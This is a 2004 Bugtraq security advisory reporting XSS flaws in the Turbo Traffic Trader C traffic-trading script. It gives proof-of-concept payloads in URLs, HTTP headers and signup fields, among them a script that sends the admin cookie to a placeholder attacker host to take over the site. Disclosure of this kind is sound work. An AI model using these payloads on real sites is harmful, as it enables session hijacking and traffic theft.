[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple TTT-C XSS vulnerabilities
From:       Kaloyan Georgiev <spam () icefire ! org>
Date:       2004-05-17 2:46:11
Message-ID: 20040517024611.2321.qmail () www ! securityfocus ! com
[Download RAW message or body]



--------------------------------------------------------
Subject: Multiple TTT-C (Turbo Traffic Trader C) XSS vulnerabilityes.
Author: Kaloyan Olegov Georgiev (ICEFIRE)
Package name: Turbo Traffic Trader C (TTT-C or TTT3)
Sumary: Multiple XSS issues
Date: 2004-05-16
Affected versions: Latest stable TTT version, all betas and release candidates.
Product site: http://www.turbotraffictrader.com/
Vendor response: nobody cares about you or  what you have to say, it's really sad you \
could be a wealthy person if you just had morals. Dude, I don't care if you post to \
the boards, I really don't , people are sick of you, everyone that does not know what \
a thief you are will know after I post, I am ready to take legal action against you. \
Need I say more about this response? Extended info: \
                http://www.icefire.org/security/ttt-bugreport.txt
--------------------------------------------------------

Package description (from vendor's site):
The World's Most Advanced Free C Traffic Trading Script
Turbo Traffic Trader C 1.0 is an advanced trading script written entirely in \
C/Sqlite, it offers you advanced features that cannot be found in other FREE scripts.

Problem description:
TTT-C does not sanityze variables. This leads to very easy XSS scripting and in some \
cases complete site traffic hijacking.

Solution:
Don't use TTT-C as the vendor seems not to care too much about all these issues.
Msg the vendor: The best option is to use the CjOverkill like or similar string \
replacement routine for <,>,% and so on characters.


Problem deep description with proof of concept code:
As no one variable is sanityzed anyone can insert HTML code into the admin interface. \
On sites with trades signup enabled there is also possible to hijack all the admin \
interface and steal the admin cookie in order to login and takeover the script. Also \
it could be used to  steal all the traffic a given site has.

Links panel XSS proof of concept code:
Link variable is not sanityzed and could be a valid XSS
Example:
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
 http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20&lt;script&gt;alert('from_browser_insert');&lt;/script&gt;


IP Logs panel XSS proof of concept code:
IP could be null
IP could be a valid XSS
Proxy is not sanityzed
Proxy could be a valid XSS
Example for proxy:
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1&lt;script&gt;alert('proxy_insert');&lt;/script&gt;
Host: www.vulnerable.com

Example for IP (needs local server access):
export REMOTE_ADDR="127.0.0.1&lt;script&gt;alert('ip_inject');&lt;/script&gt;"
./ttt-in will load one bad record for IP

Referer Logs panel XSS proof of concept code:
Referer is not sanityzed, could be a valid XSS
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6&lt;script&gt;alert('proxy_insert');&lt;/script&gt;
Referer: http://www.referrer.com"&lt;script&gt;alert('referrer_inject');&lt;/script&gt;"
                
Host: www.vulnerable.com

Edit Panel XSS:
See Main because Edit uses exactly the same variables.

Main control panel XSS (take care with this one, the example is a complete takeover):
For that one you must signup for a trade. When you signup as a new trade you need to \
put your site info and url. Insert any HTML code and it will work.
Example:
Site Name = http://www.owned.com"&lt;script&gt;cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';&lt;/script&gt;
 Site URL = http://www.owned.com"&lt;script&gt;cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';&lt;/script&gt;
 Webmaster e-mail = email@something.com"&lt;script&gt;alert('email_inject');&lt;/script&gt;
 Webmaster ICQ = 123456"&lt;script&gt;alert('ICQ_inject');&lt;/script&gt;

This one ast could lead to the theft of all the traffic that site has because when \
the site name or domain get into the toplist any visitor of that site will get the \
XSS and will get redirected.

Any other HTML will work, so use your imagination. the examples are quite simple, but \
you still can get the point.

Kaloyan Olegov Georgiev


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic